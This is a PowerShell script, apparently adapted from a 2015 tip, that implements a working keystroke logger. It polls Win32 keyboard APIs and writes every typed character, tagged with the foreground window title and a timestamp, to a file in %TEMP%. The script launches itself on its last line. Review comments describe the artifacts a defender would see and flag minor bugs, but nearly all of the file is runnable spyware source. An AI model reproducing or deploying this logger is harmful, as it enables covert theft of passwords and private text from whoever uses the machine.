$logger = {
    # Log destination. Default is %TEMP%\logger.txt; the caller may override
    # with -Path, but note the status line printed after the scriptblock
    # (bottom of file) hard-codes the default rather than echoing $Path.
    param($Path = "$env:tmp\logger.txt")

    <#
    .DESCRIPTION
    Keystroke logger implemented by polling the Win32 user32.dll API from
    PowerShell. Every 40 ms it calls GetAsyncKeyState for virtual-key codes
    9..254, translates any newly pressed key to text with ToUnicodeEx using
    the keyboard layout of the foreground window's thread, and appends the
    character to $Path (UTF-16LE). Whenever the foreground window title
    changes, a "[title] [local timestamp]" header line is written first.

    The loop is endless; stop it with CTRL+C. Despite the original tip's
    wording, nothing is displayed on exit -- the finally block below is
    empty, and the only output is the file at $Path.

    NOTE(review): this is offensive tooling. From a defender's view the
    observable artifacts are (1) Add-Type compiling a C# class named
    API.Win32 with user32.dll P/Invoke signatures inside powershell.exe,
    (2) a tight GetAsyncKeyState polling loop, and (3) a growing UTF-16LE
    text file in %TEMP%. PowerShell ScriptBlock logging records the
    scriptblock text itself.

    .NOTES
    http://powershell.com/cs/blogs/tips/archive/2015/12/09/creating-simple-keylogger.aspx
    #>

    # C# P/Invoke declarations compiled once per session via Add-Type.
    # (Here-string content is passed verbatim to the C# compiler; do not
    # add PowerShell comments inside it.)
    $signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicodeEx(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags, IntPtr dwhkl);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern IntPtr GetKeyboardLayout(int idThread);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll", CharSet=CharSet.Auto , SetLastError=true)]
public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out int lpdwProcessId);
[DllImport("user32.dll",CharSet=CharSet.Auto, SetLastError=true)]
public static extern int GetWindowText(IntPtr hWnd, System.Text.StringBuilder lpString,int nMaxCount);
[DllImport("user32.dll", CharSet=CharSet.Auto , SetLastError = true)]
public static extern int GetWindowTextLength(IntPtr hwnd);
'@

    # Compile the signatures into a type and cache it in script scope so a
    # second invocation in the same session does not re-run Add-Type
    # (re-adding a type with the same name would fail). When this file is
    # dot-sourced or pasted into a console rather than run as a script,
    # $Script: resolves to the session scope -- same effect.
    if($Script:API -eq $null){
        $Script:API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
    }

    # Explicit file creation is disabled; AppendAllText below creates the
    # file on first write if it does not exist.
    # $null = New-Item -Path $Path -ItemType File -Force

    try
    {
        # Endless poll loop. CTRL+C unwinds through the (empty) finally.
        while ($true)
        {
            # 40 ms poll interval. GetAsyncKeyState's low bit ("pressed since
            # last call") is cleared by each call, and the test below also
            # requires the high bit ("currently down"), so a key tapped and
            # released entirely between two polls is presumably missed.
            Start-Sleep -Milliseconds 40

            # Iterate virtual-key codes 9..254 (these are VK codes, not ASCII;
            # 9 = VK_TAB). 0..8 are skipped.
            for ($ascii = 9; $ascii -le 254; $ascii++)
            {
                # short return: 0x8000 = key currently down, 0x0001 = pressed
                # since the previous call for this key.
                $state = $Script:API::GetAsyncKeyState($ascii)

                # -32767 is 0x8001 as a signed 16-bit value: both bits set,
                # i.e. a fresh press that is still held.
                if ($state -eq -32767)
                {
                    # Result discarded; purpose unclear (possibly a no-op left
                    # over from the original tip, or meant to force a
                    # keyboard-state refresh) -- TODO confirm.
                    $null = [console]::CapsLock

                    # $API (no scope qualifier) resolves to $Script:API via
                    # normal scope lookup; inconsistent with the other calls.
                    # NOTE(review): uMapType 3 is MAPVK_VSC_TO_VK_EX, yet the
                    # value passed is the loop's VK code, not a scan code --
                    # the result is only fed to ToUnicodeEx's wScanCode, so
                    # verify this mapping is what was intended.
                    $virtualKey = $API::MapVirtualKey($ascii, 3)

                    # 256-byte modifier/toggle state array consumed by
                    # ToUnicodeEx (shift, caps lock, etc.). Return value is
                    # captured but never checked.
                    $kbstate = New-Object Byte[] 256
                    $checkkbstate = $API::GetKeyboardState($kbstate)

                    # Receives the translated character(s); default capacity
                    # is passed as cchBuff below.
                    $mychar = New-Object -TypeName System.Text.StringBuilder

                    # Foreground window title, used as the per-window context
                    # header in the log. Buffer is title length + 1 for the
                    # terminating NUL.
                    $myHwnd = $Script:API::GetForegroundWindow()
                    $length = $Script:API::GetWindowTextLength($myHwnd)
                    $sb = New-Object -TypeName System.Text.StringBuilder ($length + 1)


                    $Script:API::GetWindowText($myHwnd, $sb, $sb.Capacity) | Out-Null;
                    $sb = $sb.ToString()


                    # Declared as IntPtr but bound to an 'out int' parameter;
                    # PowerShell converts through [ref]. The PID is not used.
                    $myPid = [IntPtr]::Zero

                    # Thread id of the foreground window -> that thread's
                    # keyboard layout (HKL), so translation honours the
                    # active layout of the window being typed into.
                    $myTid = $Script:API::GetWindowThreadProcessId($myHWND,[ref] $myPid)
                    $dwhkl = $Script:API::GetKeyboardLayout($myTid)
                    # Non-zero result = characters written to $mychar
                    # (negative for dead keys, which is also truthy here).
                    $success = $Script:API::ToUnicodeEx($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0,$dwhkl)

                    if ($success)
                    {

                        # Each keystroke is a separate open/append/close of
                        # the log file, written as UTF-16LE.
                        if ($mychar.ToString()-eq "`r") {
                            # Enter is stored as CRLF rather than a bare CR.
                            [System.IO.File]::AppendAllText($Path,"`r`n", [System.Text.Encoding]::Unicode)
                        } else {
                            # $old_sb is never initialised before the loop, so
                            # the first comparison is against $null; the header
                            # branch is taken unless the title is empty
                            # ("" -eq $null is true in PowerShell).
                            if ($sb -eq $old_sb) {
                                [System.IO.File]::AppendAllText($Path,$mychar, [System.Text.Encoding]::Unicode)
                            } else {
                                # New foreground window: write
                                # "\r\n[title] [timestamp]\r\n" before the char.
                                # DateTime.Now is local time with no zone info,
                                # so timestamps are ambiguous for forensics.
                                [System.IO.File]::AppendAllText($Path, "`r`n" + '[' + $sb + '] [' + [System.DateTime]::Now.ToString() + ']' + "`r`n" + $mychar, [System.Text.Encoding]::Unicode)
                                $old_sb = $sb
                            }
                        }




                    }
                }
            }
        }
    }
    finally
    {
        # Intentionally empty: nothing is flushed or displayed on CTRL+C;
        # the log already lives on disk at $Path.
    }
}
# Prints the default location, not the value of -Path if one is supplied.
"log file :" + "$env:tmp\logger.txt"
& $logger